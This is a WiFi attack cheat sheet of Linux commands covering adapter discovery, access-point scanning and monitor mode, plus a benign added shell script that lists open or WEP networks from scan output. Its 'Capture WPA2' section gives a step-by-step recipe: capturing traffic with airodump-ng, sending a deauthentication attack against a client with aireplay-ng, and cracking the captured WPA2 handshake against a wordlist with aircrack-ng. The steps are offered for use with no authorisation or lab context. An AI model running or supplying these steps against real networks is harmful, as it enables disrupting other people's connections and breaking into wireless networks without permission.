WiFi Cheat Sheet
nmcli device status
Prints the connected wireless adapters
iwlist [adapter] scan
Scans for local APs (access points)
iwlist [adapter] scan | egrep 'Address|ESSID'
Narrows the output of the previous scan to the Address and ESSID lines
airmon-ng start [adapter]
Starts monitor mode on selected adapter
iwconfig | grep 'Monitor'
Shows the monitor mode device
airodump-ng [adapter]
Shows the access points and devices you can capture
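An added example, not part of the original cheat sheet: the egrep filter above keeps only the Address and ESSID lines, while this shell function turns the same `iwlist [adapter] scan` output into one row per AP and lists the open or WEP networks, which is the view you want when auditing your own site. The function names and the sample scan text are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: one line per AP from `iwlist [adapter] scan` output.

# Constructed sample in the layout iwlist prints (not from a real scan).
sample_scan() {
cat <<'EOF'
wlan0     Scan completed :
          Cell 01 - Address: 02:00:00:AA:BB:01
                    Channel:6
                    Encryption key:on
                    ESSID:"office-wpa2"
                    IE: IEEE 802.11i/WPA2 Version 1
          Cell 02 - Address: 02:00:00:AA:BB:02
                    Channel:11
                    Encryption key:off
                    ESSID:"guest-open"
          Cell 03 - Address: 02:00:00:AA:BB:03
                    Channel:1
                    Encryption key:on
                    ESSID:"legacy printer"
EOF
}

# Reads scan text on stdin; prints BSSID, channel, security, ESSID (tab-separated).
summarize_scan() {
  awk '
    function emit() {
      if (bssid == "") return
      if (key == "off")     sec = "OPEN"
      else if (wpa2)        sec = "WPA2"
      else if (wpa)         sec = "WPA"
      else if (key == "on") sec = "WEP"   # key on, but no WPA/WPA2 IE advertised
      else                  sec = "?"     # no "Encryption key" line seen
      printf "%s\t%s\t%s\t%s\n", bssid, chan, sec, essid
    }
    / Address: /      { emit(); bssid = $NF; chan = "?"; key = ""; wpa = wpa2 = 0; essid = "" }
    /^ *Channel:/     { sub(/^ *Channel:/, ""); chan = $0 }
    /Encryption key:/ { sub(/.*Encryption key:/, ""); key = $0 }
    /ESSID:"/         { sub(/^[^"]*"/, ""); sub(/"$/, ""); essid = $0 }
    /IE: .*WPA2/      { wpa2 = 1 }
    /IE: WPA Version/ { wpa = 1 }
    END               { emit() }
  '
}

# APs worth following up on your own network: no encryption, or WEP.
weak_aps() { summarize_scan | awk -F'\t' '$3 == "OPEN" || $3 == "WEP"'; }

sample_scan | weak_aps   # live use: iwlist [adapter] scan | weak_aps
```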
Capture WPA2
To capture packets from an access point use the following command:
airodump-ng -c [channel of access point] --bssid [access point] -w [filename] [adapter]
Leave this running in its own terminal
To perform a deauthentication attack use the following command in a second terminal window:
aireplay-ng -0 1 -a [accesspoint] -c [client address] [adapter]
Check the first terminal or tab; we should now have captured the handshake
To use a word list against the captured handshake use the following command:
aircrack-ng -0 -w [wordlist] [captured filename(.cap)]